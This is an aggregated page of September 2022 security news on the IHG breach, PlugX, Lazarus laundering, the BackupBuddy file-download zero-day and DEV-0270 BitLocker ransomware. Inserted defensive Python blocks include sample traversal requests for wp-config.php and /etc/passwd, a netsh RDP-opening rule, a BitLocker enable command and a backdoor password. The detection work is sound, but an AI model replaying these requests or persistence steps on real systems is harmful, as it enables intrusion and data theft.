Feed aggregator

IHG suffered a cyberattack that severely impacted its booking process

Security Affairs - Sat, 09/10/2022 - 10:28
InterContinental Hotels Group PLC (IHG) has disclosed a security breach: parts of its IT infrastructure have been subject to unauthorised activity.

The hospitality conglomerate InterContinental Hotels Group (IHG) manages 17 hotel chains, including Regent, Crowne Plaza, Holiday Inn and Candlewood Suites, and operates 6,028 hotels in more than 100 countries.

The company announced that its Holiday Inn subsidiary suffered a cyberattack in which the attackers had access to parts of the company’s technology systems.

The attack significantly disrupted IHG’s booking channels and other applications, a pattern that suggests the company may have been the victim of a ransomware attack. The breach also affected bookings made through third-party sites such as Expedia and Booking.com; service was restored only intermittently during the week.

“InterContinental Hotels Group PLC (IHG or the Company) reports that parts of the Company’s technology systems have been subject to unauthorised activity.” reads a statement published by the company. “IHG has implemented its response plans, is notifying relevant regulatory authorities and is working closely with its technology suppliers. External specialists have also been engaged to investigate the incident.”

IHG is working to restore its operations and determine the extent and impact of the incident.

The Post reported that franchisees said significant disruptions continued to make the system unavailable as of early Friday.

“Customers who are trying to book rooms can only log onto Holiday Inn’s site and make reservations about half the time, according to Vimal Patel, a franchisee who operates Holiday Inn Express hotels in LaPlace, La. and Donaldsville.” reported The Post.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post IHG suffered a cyberattack that severely impacted its booking process appeared first on Security Affairs.

Categories: Cyber Security News

China-Linked BRONZE PRESIDENT APT targets Government officials worldwide

Security Affairs - Sat, 09/10/2022 - 09:32
China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware.

Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government officials in Europe, the Middle East, and South America with the PlugX malware.

Attacks part of this campaign were spotted in June and July 2022.

PlugX is modular malware with backdoor capabilities that can be extended by downloading additional plugins.

“Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.” reads the analysis published by Secureworks.

BRONZE PRESIDENT, a China-based group active since at least 2014, has historically targeted political and law enforcement organizations and NGOs in Asia. The group uses both custom remote access tools and publicly available remote access and post-compromise tools to compromise target networks.

In the recent campaign, the malware is delivered inside RAR archives. When the archive is opened, it displays a Windows shortcut (LNK) file that masquerades as a document; clicking the shortcut executes the malware.

The archive also contains the malware itself in a hidden folder nested eight levels deep in a chain of hidden folders whose names consist of special characters, a trick intended to evade mail-scanning products.

The shortcut launches a renamed legitimate executable stored in the eighth hidden folder. Alongside it the attackers drop a malicious DLL and an encrypted payload file; the legitimate binaries are vulnerable to DLL search order hijacking, so they load the attacker’s DLL from their own directory instead of the intended library.

“When executed, they import the malicious DLL that loads, decrypts, and executes the payload file. In each sample analyzed by CTU researchers, the shortcut file metadata indicates the file was created on a Windows system either with hostname “desktop-n2v1smh” or “desktop-cb248vr”.” continues the report.

“Once running, the payload drops a decoy document to the logged-on user’s %Temp% directory and copies the three files to a ProgramData subdirectory using the pattern “<Application><3 characters>” (e.g., Operavng)”
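The archive layout described above lends itself to a mechanical triage check. The following Python is an example added for this page, not Secureworks’ tooling: it walks an archive listing and flags a document-named LNK, a chain of at least eight hidden folders with non-printable names, and a folder holding the EXE/DLL/payload triad. The listing is constructed, and the assumption that the special-character folder names contain nothing printable is mine; the real names were not published.

```python
"""Triage an archive listing for the lure layout described above: an LNK that
masquerades as a document, a chain of hidden folders with 'special character'
names, and a renamed legitimate EXE sitting next to a DLL and an encrypted
payload.  Added example for this page, not Secureworks' tooling; the sample
listing is constructed and the folder naming is an assumption."""
import re
from collections import namedtuple

# One archive member: its path inside the archive and its first bytes.
Entry = namedtuple("Entry", "path head")

LNK_MAGIC = b"\x4c\x00\x00\x00"   # Shell Link header: HeaderSize = 0x4C
MZ_MAGIC = b"MZ"                  # PE executable (EXE or DLL)
DOCUMENT_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx", ".rtf")

# Assumed shape of the 'special character' folder names: nothing printable.
SPECIAL_FOLDER = re.compile(r"^[\s\x00-\x1f\x7f-\xff]+$")


def masquerading_shortcut(entry):
    """True for an LNK whose name pretends to be a document (Agenda.docx.lnk)."""
    if not entry.head.startswith(LNK_MAGIC):
        return False
    name = entry.path.rsplit("/", 1)[-1].lower()
    base = name[:-4] if name.endswith(".lnk") else name
    return base.endswith(DOCUMENT_EXTS)


def hidden_chain_depth(entry):
    """Number of parent folders whose names are made only of special characters."""
    return sum(1 for part in entry.path.split("/")[:-1] if SPECIAL_FOLDER.match(part))


def sideload_triads(entries):
    """Folders holding an EXE, a DLL and at least one non-PE file together:
    the renamed legitimate binary, the DLL it will search-order-load, and
    the encrypted payload the DLL decrypts."""
    by_dir = {}
    for e in entries:
        folder, _, name = e.path.rpartition("/")
        by_dir.setdefault(folder, []).append((name.lower(), e.head))
    hits = []
    for folder, members in by_dir.items():
        exe = any(h.startswith(MZ_MAGIC) and n.endswith(".exe") for n, h in members)
        dll = any(h.startswith(MZ_MAGIC) and n.endswith(".dll") for n, h in members)
        blob = any(not h.startswith(MZ_MAGIC) and not h.startswith(LNK_MAGIC) for n, h in members)
        if exe and dll and blob:
            hits.append(folder)
    return hits


def triage(entries, min_depth=8):
    """Return (indicator, path) pairs; an empty list means nothing matched."""
    findings = []
    for e in entries:
        if masquerading_shortcut(e):
            findings.append(("lnk-masquerade", e.path))
        if hidden_chain_depth(e) >= min_depth:
            findings.append(("deep-hidden-chain", e.path))
    findings.extend(("sideload-triad", folder) for folder in sideload_triads(entries))
    return findings


# Constructed listing (not a real sample): eight nested folders named with a
# single non-breaking space, holding the three-file triad.
HIDDEN = "/".join(["\u00a0"] * 8)
SAMPLE = [
    Entry("Meeting_Agenda.docx.lnk", LNK_MAGIC + b"\x01\x14\x02\x00"),
    Entry(HIDDEN + "/Viewer.exe", MZ_MAGIC + b"\x90\x00\x03\x00"),
    Entry(HIDDEN + "/Viewer.dll", MZ_MAGIC + b"\x90\x00\x03\x00"),
    Entry(HIDDEN + "/Viewer.dat", b"\x8f\x1a\x33\x7c"),
]

if __name__ == "__main__":
    for indicator, path in triage(SAMPLE):
        print(f"{indicator:18} {path!r}")
```

Feed it the member paths and the first few bytes of each member from whatever archive library you use (a listing plus a short header read is enough), and treat any non-empty result as a reason to detonate the archive in a sandbox rather than deliver it.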

The researchers recommend that organizations in geographic regions of interest to China monitor this group’s activity; Secureworks also shared indicators of compromise for the campaign.

“BRONZE PRESIDENT has demonstrated an ability to pivot quickly for new intelligence collection opportunities. Organizations in geographic regions of interest to China should closely monitor this group’s activities, especially organizations associated with or operating as government agencies.” concludes the report.

Pierluigi Paganini

(SecurityAffairs – hacking, BRONZE PRESIDENT)

Scammers live-streamed on YouTube a fake Apple crypto event

Security Affairs - Sat, 09/10/2022 - 07:25
Scammers live-streamed on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it.

Cybercriminals live-streamed on YouTube an old interview with Tim Cook, conducted by CNN in 2018, as part of a fake Apple crypto event; tens of thousands of users viewed it.

To lure viewers, the scammers stuffed the stream’s title and description with Apple keywords.

“The fake live stream was getting attention by filling its description with an array of Apple keywords in both the title and description. But when you actually opened it up, it was filled with odd messages linking to a shady-looking crypto site.” reported The Verge.

The scammers covered the CNN logo in the original interview with the text “Apple Crypto Event 2022,” and added Bitcoin and Ethereum logos to the stream. The video also included a bold text reading “URGENT NEWS” at the bottom.

[Image: the fake Apple live stream. Screenshot by Jay Peters / The Verge]

The fake stream was launched while Apple was streaming its iPhone 14 announcement event, to catch users searching for any video from the company.

The channel’s page made clear that it had been hijacked by the attackers and repurposed to stream the video.

After The Verge published the news about the fraudulent live stream, YouTube removed the video for violating company terms of service.

“I came upon this stream because it was recommended on my YouTube homepage — that might have been in part because I’ve been watching Apple videos from the event throughout the day.” continues The Verge. “When I first started watching the fake stream, there were around 16K viewers, and right before first publishing this story, that count was nearly 70K.”

The Verge also found a second live stream on a separate channel, advertised as an event with Cook and Elon Musk about Apple and the metaverse; it had more than 10,000 viewers.

Update September 7th, 10:54PM ET: YouTube has removed the live streams.

Pierluigi Paganini

(SecurityAffairs – hacking, scam)

U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

The Hacker News - Sat, 09/10/2022 - 05:43
The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies. "Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector

US Treasury sanctioned Iran’s Ministry of Intelligence over Albania cyberattack

Security Affairs - Fri, 09/09/2022 - 15:48
The U.S. Treasury Department sanctioned Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the Albania cyberattack.

The U.S. Treasury Department announced sanctions against Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the cyberattack that hit Albania in July.

MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iranian intelligence community. It is also known as VAJA and previously as VEVAK (Vezarat-e Ettela’at va Amniyat-e Keshvar).

Since at least 2007, MOIS has coordinated a series of cyber operations against government entities and private organizations around the world. In January, USCYBERCOM officially linked the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros) to MOIS.

“Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence for engaging in cyber-enabled activities against the United States and its allies.” reads the press release of the U.S. Treasury Department. “In July 2022, cyber threat actors assessed to be sponsored by the Government of Iran and MOIS disrupted Albanian government computer systems, forcing the government to suspend online public services for its citizens.”

“Iran’s cyber attack against Albania disregards norms of responsible peacetime State behavior in cyberspace, which includes a norm on refraining from damaging critical infrastructure that provides services to the public,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson. “We will not tolerate Iran’s increasingly aggressive cyber activities targeting the United States or our allies and partners.”  

Albanian Prime Minister Edi Rama announced this week that Albania had severed diplomatic ties with Iran and expelled the country’s embassy staff over the massive cyberattack that hit the country in mid-July.

The cyberattack hit the servers of the National Agency for Information Society (AKSHI), which handles many government services. Most public-facing services were interrupted; only a few important ones, such as online tax filing, kept working because they run on servers that were not targeted. Albania reported the attack to NATO member states and other allies.

According to a statement published by the government, the damages may be considered minimal compared to the goals of the threat actors.

The Iranian embassy staff were asked to leave Albania within 24 hours.

The United States government issued a statement condemning Iran for attacking Albania.

“The United States strongly condemns Iran’s cyberattack against our NATO Ally, Albania. We join in Prime Minister Rama’s call for Iran to be held accountable for this unprecedented cyber incident. The United States will take further action to hold Iran accountable for actions that threaten the security of a U.S. ally and set a troubling precedent for cyberspace.” U.S. National Security Council spokesperson Adrienne Watson said. “We have concluded that the Government of Iran conducted this reckless and irresponsible cyberattack and that it is responsible for subsequent hack and leak operations.”

The relations between Albania and Iran have deteriorated since the government of Tirana offered asylum to thousands of Iranian dissidents.

NATO and the U.K. also formally blamed the Iranian government for the cyberattacks against Albania.

Pierluigi Paganini

(SecurityAffairs – hacking, Albania cyberattack)

$30 Million worth of cryptocurrency stolen by Lazarus from Axie Infinity was recovered

Security Affairs - Fri, 09/09/2022 - 12:09
US authorities recovered more than $30 million worth of cryptocurrency stolen by the North Korea-linked Lazarus APT from Axie Infinity.

A joint operation by law enforcement and leading organizations in the cryptocurrency industry recovered more than $30 million worth of cryptocurrency stolen by the North Korea-linked APT group Lazarus from the online video game Axie Infinity.

In March, threat actors stole almost $625 million in Ethereum (ETH) and USDC (a U.S. dollar-pegged stablecoin) from Axie Infinity’s Ronin network bridge. The theft took place on March 23, but was discovered only after a user was unable to withdraw 5,000 ether.

The Ronin Network is an Ethereum-linked sidechain used for the blockchain game Axie Infinity.

The attackers have stolen roughly 173,600 ether and 25.5 million USDC.

According to a post published by Blockchain security firm Chainalysis, its Crypto Incident Response team played a role in these seizures, providing its advanced tracing techniques to follow stolen funds to cash out points. 

“The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains,” reads a post published by Chainalysis.

A report from The Block published in July and citing two people familiar with the matter revealed that threat actors targeted a senior engineer at the company with a fake job offer via LinkedIn.

The attackers offered a job with an extremely generous compensation package to a Sky Mavis engineer.

A PDF containing the offer was sent to the employee; when he opened it, spyware compromised his system and gave the attackers a foothold in Ronin’s network. From there the threat actors took over four of the nine Ronin validator nodes, the ones run by Sky Mavis.

In April, the U.S. government blamed North Korea-linked APT Lazarus for the Ronin Validator cyber heist.

In July, the U.S. Treasury announced sanctions against the Ethereum address used by the North Korea-linked APT to receive the stolen funds; U.S. persons are prohibited from transacting with that address.

Chainalysis’s report states that the attack began when the Lazarus Group gained access to five of the nine private keys held by transaction validators for Ronin Network’s cross-chain bridge (the four Sky Mavis validators plus the Axie DAO validator, which Sky Mavis had been allowed to sign for). The group used them to approve two withdrawals: one for 173,600 ether (ETH) and the other for 25.5 million USD Coin (USDC). Chainalysis began tracing the funds when the group started laundering them. The group’s laundering operation is highly sophisticated; it has used more than 12,000 different crypto addresses to date.

The laundering process typically used by Lazarus has five stages:

  1. Stolen Ether sent to intermediary wallets
  2. Ether mixed in batches using Tornado Cash
  3. Ether swapped for bitcoin
  4. Bitcoin mixed in batches
  5. Bitcoin deposited to crypto-to-fiat services for cashout

This process was also used to launder large portions of Ronin’s stolen funds.

After the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned the Tornado Cash mixer in August, Lazarus shifted to DeFi services such as cross-chain bridges to launder the remaining funds.

“Above, we see that the hacker bridged ETH from the Ethereum blockchain to the BNB chain and then swapped that ETH for USDD, which was then bridged to the BitTorrent chain. Lazarus Group carried out hundreds of similar transactions across several blockchains to launder the funds they stole from Axie Infinity, in addition to the more conventional Tornado Cash-based laundering we covered above.” continues the report.
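From the analyst’s side, the five stages above and the bridge hops that replaced Tornado Cash are one graph-tracing problem. The Python below is an added example, not Chainalysis’ tooling: it replays a constructed transfer ledger with “haircut” (proportional) taint, treats mixers as sinks, follows value through bridges, and reports how much stolen value reached each kind of service. The addresses, the USD amounts and the service labels are all constructed.

```python
"""Haircut (proportional) taint tracing over a transfer ledger: follow value
from the attacker's address through intermediary wallets and report how much
reaches mixers, bridges and cash-out points.  Added example for this page,
not Chainalysis' tooling; the ledger, address names and USD amounts are
constructed."""
from collections import defaultdict

# (tx_id, sender, receiver, amount in USD at time of transfer)
LEDGER = [
    ("t0", "ronin_bridge", "attacker", 1_000_000),   # the bridge withdrawals, merged
    ("t1", "attacker", "wallet_1", 600_000),         # stage 1: intermediary wallets
    ("t2", "attacker", "wallet_2", 400_000),
    ("t3", "wallet_1", "tornado_pool", 600_000),     # stage 2: mixer deposit
    ("t4", "wallet_2", "bnb_bridge", 400_000),       # post-sanctions path: cross-chain bridge
    ("t5", "bnb_bridge", "wallet_3", 400_000),
    ("t6", "ico_payout", "clean_user", 100_000),     # unrelated, clean funds
    ("t7", "clean_user", "wallet_3", 100_000),       # commingled with the stolen funds
    ("t8", "wallet_3", "otc_desk", 250_000),         # stage 5: cash-out point
]

# Assumed attribution labels for service addresses.
LABELS = {"tornado_pool": "mixer", "bnb_bridge": "bridge", "otc_desk": "cashout"}


def trace(ledger, seeds, labels):
    """Replay the ledger in order.  Each outgoing transfer carries taint in
    proportion to the tainted share of the sender's balance (the 'haircut'
    rule).  Mixers are sinks: value entering them is counted but not
    followed, because post-mixer attribution needs separate clustering."""
    balance = defaultdict(float)
    tainted = defaultdict(float)
    exposure = defaultdict(float)   # service type -> tainted USD that reached it
    hops = []                       # (tx_id, receiver, tainted USD) for every tainted hop
    for tx, src, dst, amount in ledger:
        if dst in seeds:
            share = 1.0                       # everything landing on a seed is stolen
        elif balance[src] > 0:
            share = tainted[src] / balance[src]
        else:
            share = 0.0                       # unknown external source: treat as clean
        taint = amount * share
        balance[src] -= amount
        tainted[src] -= taint
        balance[dst] += amount
        if taint <= 0:
            continue
        hops.append((tx, dst, round(taint, 2)))
        kind = labels.get(dst)
        if kind:
            exposure[kind] += taint
        if kind != "mixer":
            tainted[dst] += taint
    return {k: round(v, 2) for k, v in exposure.items()}, hops


def tainted_addresses(hops):
    """Set of addresses that received any stolen value."""
    return {dst for _, dst, _ in hops}


if __name__ == "__main__":
    exposure, hops = trace(LEDGER, {"attacker"}, LABELS)
    for tx, dst, usd in hops:
        print(f"{tx}: {usd:>12,.2f} USD of stolen value -> {dst}")
    print("exposure by service type:", exposure)
```

The haircut rule is the simplest of several taint conventions (FIFO and poison are the other common ones); which one a seizure request relies on matters, because in the commingled wallet_3 above only 80% of the cash-out is attributed to the theft under haircut, whereas a poison rule would attribute all of it.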

Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus)

6 Top API Security Risks! Favored Targets for Attackers If Left Unmanaged

The Hacker News - Fri, 09/09/2022 - 09:30
Security threats are always a concern when it comes to APIs. API security can be compared to driving a car. You must be cautious and review everything closely before releasing it into the world. By failing to do so, you're putting yourself and others at risk. API attacks are more dangerous than other breaches. Facebook had a 50M user account affected by an API breach, and an API data breach on

Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin

Security Affairs - Fri, 09/09/2022 - 07:50
Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned.

On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files.

The vulnerability, tracked as CVE-2022-31474 (CVSS score: 7.5), can be exploited by an unauthenticated user to download arbitrary files from the affected site. The plugin has an estimated 140,000 active installations.

Wordfence researchers determined that threat actors started exploiting this vulnerability in the wild on August 26, 2022. The security firm said it has blocked 4,948,926 attacks exploiting the flaw since then.

The attackers were attempting to retrieve sensitive files such as wp-config.php (which holds the site’s database credentials) and /etc/passwd.

The vulnerability affects versions 8.5.8.0 to 8.7.4.1 and was fixed with the release of version 8.7.5 on September 2, 2022.

The plugin can store backups in multiple locations (“Destinations”), including Google Drive, OneDrive and AWS, as well as via a ‘Local Directory Copy’ option. Wordfence found that the local option is insecure and lets unauthenticated users download any file stored on the server.

“More specifically the plugin registers an admin_init hook for the function intended to download local back-up files and the function itself did not have any capability checks nor any nonce validation. This means that the function could be triggered via any administrative page, including those that can be called without authentication (admin-post.php), making it possible for unauthenticated users to call the function.” reads the report. “The back-up path is not validated and therefore an arbitrary file could be supplied and subsequently downloaded.”
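Two defensive checks follow from that description, shown here in Python as an added example (not Wordfence’s or the plugin’s code). The first is the containment test a “download local backup” handler must apply to the requested path, which the plugin lacked; the second scans web-server access logs for admin-post.php requests that name sensitive files or use traversal, the pattern the blocked attacks would leave. The parameter name backup_file, the backup directory and the log lines are constructed; Wordfence did not publish the real request format.

```python
"""Two defensive checks for the flaw class described above.  Added example
for this page, not Wordfence's or the plugin's code.  (1) safe_backup_path is
the containment test a 'download local backup' handler must apply: only bare
file names, resolved inside the backup directory.  (2) suspicious_requests
scans access-log lines for admin-post.php requests whose parameters name
sensitive files or use traversal.  The parameter name 'backup_file', the
directory and the log lines are constructed assumptions."""
import os
import re
from urllib.parse import parse_qs, urlsplit

BACKUP_DIR = "/nonexistent/backupbuddy_backups"   # assumed location
SENSITIVE = ("wp-config.php", "/etc/passwd", "/etc/shadow", ".htaccess", ".git/")


def safe_backup_path(backup_dir, requested):
    """Absolute path to serve, or None if `requested` is not a plain file
    name that resolves inside backup_dir (catches ../, absolute paths,
    and symlinked names pointing outside the directory)."""
    if not requested or requested in (".", "..") or os.path.basename(requested) != requested:
        return None
    base = os.path.realpath(backup_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


# Combined-log-format line: client, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def suspicious_requests(lines):
    """(client, parameter, value, status) for every admin-post.php request
    carrying a sensitive path or traversal in any query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        for key, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:   # parse_qs already percent-decodes the value
                if "../" in value or "..\\" in value or any(s in value for s in SENSITIVE):
                    hits.append((m["ip"], key, value, m["status"]))
    return hits


# Constructed log lines: two exploitation attempts that succeeded (200), one
# legitimate download, one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Aug/2022:03:14:07 +0000] "GET /wp-admin/admin-post.php?action=download_backup&backup_file=/etc/passwd HTTP/1.1" 200 1893',
    '203.0.113.7 - - [26/Aug/2022:03:14:09 +0000] "GET /wp-admin/admin-post.php?action=download_backup&backup_file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 3211',
    '198.51.100.20 - - [26/Aug/2022:03:15:00 +0000] "GET /wp-admin/admin-post.php?action=download_backup&backup_file=backup-2022-08-25.zip HTTP/1.1" 200 52871',
    '198.51.100.21 - - [26/Aug/2022:03:16:00 +0000] "GET /index.php?p=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for ip, key, value, status in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {key}={value!r} -> HTTP {status}")
    for name in ("backup-2022-08-25.zip", "../wp-config.php", "/etc/passwd"):
        print(f"{name!r:30} -> {safe_backup_path(BACKUP_DIR, name)}")
```

A 200 status on a hit is the signal to act on: a traversal request that returned 200 with a body of a few kilobytes most likely handed wp-config.php to the client, so rotate the database credentials and salts rather than only updating the plugin.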

“Due to this vulnerability being actively exploited, and its ease of exploitation, we are sharing minimal details about this vulnerability.” Wordfence added; further technical details were withheld because the flaw is easy to exploit.

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

U.S. Seizes Cryptocurrency Worth $30 Million Stolen by North Korean Hackers

The Hacker News - Fri, 09/09/2022 - 07:36
More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized. "The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and

Iran-linked DEV-0270 group abuses BitLocker to encrypt victims’ devices

Security Affairs - Fri, 09/09/2022 - 04:57
Iran-linked APT group DEV-0270 (aka Nemesis Kitten) is abusing the BitLocker Windows feature to encrypt victims’ devices.

Microsoft Security Threat Intelligence researchers reported that Iran-linked APT group DEV-0270 (Nemesis Kitten) has been abusing the BitLocker Windows feature to encrypt victims’ devices.

The researchers tracked multiple ransomware attacks by DEV-0270, a sub-group of the Iranian actor PHOSPHORUS.

DEV-0270 exploits high-severity vulnerabilities to gain initial access and makes extensive use of living-off-the-land binaries (LOLBINs) to harvest credentials. The researchers observed the group abusing the built-in BitLocker tool to encrypt data on compromised devices.

“In many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon—this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes.” reads the analysis published by Microsoft. “While there have been indications that DEV-0270 attempted to exploit Log4j 2 vulnerabilities, Microsoft has not observed this activity used against customers to deploy ransomware.”

DEV-0270 usually obtains administrator or SYSTEM-level privileges at initial access by injecting a web shell into a privileged process on a vulnerable web server; alternatively, it creates or activates a user account and grants it administrator privileges.

In some attacks, the time between initial access and the ransom note (time to ransom, TTR) was about two days. The group demands USD 8,000 for the decryption keys; when victims refuse to pay, it tries to monetise the intrusion by selling the stolen data.

To maintain persistence in a compromised network, DEV-0270 adds or creates a new user account (DefaultAccount, with the password P@ssw0rd1a), modifies the registry to allow Remote Desktop (RDP) connections to the device, adds a firewall rule permitting RDP, and adds the account to the Remote Desktop Users group. The threat actors also use scheduled tasks to keep access to a device.

“DEV-0270 has been seen using setup.bat commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses DiskCryptor, an open-source full disk encryption system for Windows that allows for the encryption of a device’s entire hard drive.” continues the report. “The group drops DiskCryptor from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.”
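The persistence and encryption steps above map to a small set of Windows events that can be correlated per host: account creation (4720), membership in Remote Desktop Users (4732), fDenyTSConnections flipped to 0 (Sysmon event 13), an RDP firewall rule (4688 with netsh), a new scheduled task (4698) and BitLocker being switched on (4688 with manage-bde). The Python below is an added example, not Microsoft’s detection logic; the events are constructed and the exact command lines are assumptions, since the report describes the actions rather than the syntax.

```python
"""Correlate the persistence and encryption steps described above across a
host's Windows event stream.  Added example for this page, not Microsoft's
detection logic; the events are constructed and the command-line syntax is
assumed."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    {"host": "SRV-EXCH01", "time": "2022-09-01T02:10:00", "id": 4720,
     "fields": {"TargetUserName": "DefaultAccount"}},
    {"host": "SRV-EXCH01", "time": "2022-09-01T02:10:05", "id": 4732,
     "fields": {"TargetUserName": "Remote Desktop Users", "MemberName": "DefaultAccount"}},
    {"host": "SRV-EXCH01", "time": "2022-09-01T02:11:00", "id": 13,
     "fields": {"TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
                "Details": "DWORD (0x00000000)"}},
    {"host": "SRV-EXCH01", "time": "2022-09-01T02:11:30", "id": 4688,
     "fields": {"CommandLine": 'netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow'}},
    {"host": "SRV-EXCH01", "time": "2022-09-01T02:20:00", "id": 4698,
     "fields": {"TaskName": r"\Microsoft\Windows\Update\Sync"}},
    {"host": "SRV-EXCH01", "time": "2022-09-02T23:40:00", "id": 4688,
     "fields": {"CommandLine": "manage-bde.exe -on C: -UsedSpaceOnly -RecoveryPassword"}},
    {"host": "WS-0042", "time": "2022-09-01T09:00:00", "id": 4688,
     "fields": {"CommandLine": "manage-bde.exe -status"}},   # benign status query
]


def stage_of(event):
    """Map one event to a named attack stage, or None."""
    f = event["fields"]
    cmd = f.get("CommandLine", "").lower()
    if event["id"] == 4720 and f.get("TargetUserName", "").lower() == "defaultaccount":
        return "backdoor-account"
    if event["id"] == 4732 and f.get("TargetUserName") == "Remote Desktop Users":
        return "rdp-group"
    if (event["id"] == 13 and f.get("TargetObject", "").endswith("fDenyTSConnections")
            and f.get("Details", "").endswith("(0x00000000)")):
        return "rdp-registry"
    if event["id"] == 4688 and "netsh" in cmd and "3389" in cmd and "allow" in cmd:
        return "rdp-firewall"
    if event["id"] == 4698:          # any new task counts here; tune per environment
        return "scheduled-task"
    if event["id"] == 4688 and "manage-bde" in cmd and " -on " in cmd:
        return "bitlocker-enable"
    return None


def correlate(events, window_hours=72, min_stages=3):
    """Per host: the distinct stages seen, the span between first and last
    matching event, and whether that clears the alert threshold.  72 h covers
    the roughly two-day time-to-ransom the report describes."""
    window = timedelta(hours=window_hours)
    per_host = defaultdict(list)
    for ev in events:
        stage = stage_of(ev)
        if stage:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), stage))
    report = {}
    for host, matches in per_host.items():
        matches.sort()
        stages = sorted({s for _, s in matches})
        span = matches[-1][0] - matches[0][0]
        report[host] = {
            "stages": stages,
            "span_hours": round(span.total_seconds() / 3600, 1),
            "alert": len(stages) >= min_stages and span <= window,
        }
    return report


if __name__ == "__main__":
    for host, r in correlate(SAMPLE_EVENTS).items():
        flag = "ALERT" if r["alert"] else "ok"
        print(f"{host}: {flag} {r['stages']} over {r['span_hours']} h")
```

The 4688 rules need command-line auditing enabled (or Sysmon event 1 as the source); without it the netsh and manage-bde stages never fire and the remaining three stages still clear the default threshold, which is why the account, group and registry signals are the ones to make sure you collect.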

Microsoft also provided details on who runs DEV-0270: the group appears to be operated by a company working under two public aliases, Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir), and the researchers observed multiple infrastructure overlaps between DEV-0270 and the two entities. Both are also linked to Najee Technology Hooshmand (ناجی تکنولوژی هوشمند), located in Karaj, Iran.

The group is typically opportunistic in its targeting, it scans the internet to find vulnerable servers and devices.

Pierluigi Paganini

(SecurityAffairs – hacking, PHOSPHORUS)

Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts

The Hacker News - Fri, 09/09/2022 - 04:19
A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed. "This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said. BackupBuddy allows users to back up their entire WordPress installation from within the

⚠️ Beware of e-mails from biznes.gov.pl

Niebezpiecznik.pl - Fri, 09/09/2022 - 03:42
Attack type: malware (e-mail). Threat: loss of money. Brands abused: Government of the Republic of Poland. Fake e-mails impersonating the government service biznes.gov.pl have just been sent to Poles’ inboxes. The message carries a malicious attachment and the following text threatening legal consequences: Dear User! The attachment is an official electronic notification from Biznes.gov.pl. The notification will be available in your Authorised Account from 09-08-2022 to 09-17-2022. If you do not […]

CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog

Security Affairs - Thu, 09/08/2022 - 18:05
CISA added 12 more security flaws to its Known Exploited Vulnerabilities Catalog including four D-Link vulnerabilities.

